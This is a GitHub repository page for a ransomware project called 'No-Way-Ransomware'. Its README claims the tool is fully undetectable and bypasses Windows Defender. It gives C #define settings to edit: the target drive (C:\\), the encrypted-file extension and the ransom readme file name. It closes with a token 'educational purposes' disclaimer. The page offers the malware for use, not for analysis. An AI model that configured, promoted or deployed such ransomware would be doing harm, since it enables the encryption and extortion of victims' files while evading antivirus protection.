Skip to content

theanonhackuk/No-Way-Ransomware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

No-Way-Ransomware

This ransomware uses a very simple encrypting method. It's totally FUD (Fully Undetectable), it bypass windows deffender.

Edit this strings to what you actually want:

// Where to encrypt
#define DESTINATION_DIR "C:\\"

// Extension name
#define ENCRYPTED_FILE_NAME ".enc"

// Readme file
#define CONF_FILE_NAME "readme_encrypted_files.txt"

I am not responsable for any bad use of the software, all is for educational pruposes.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages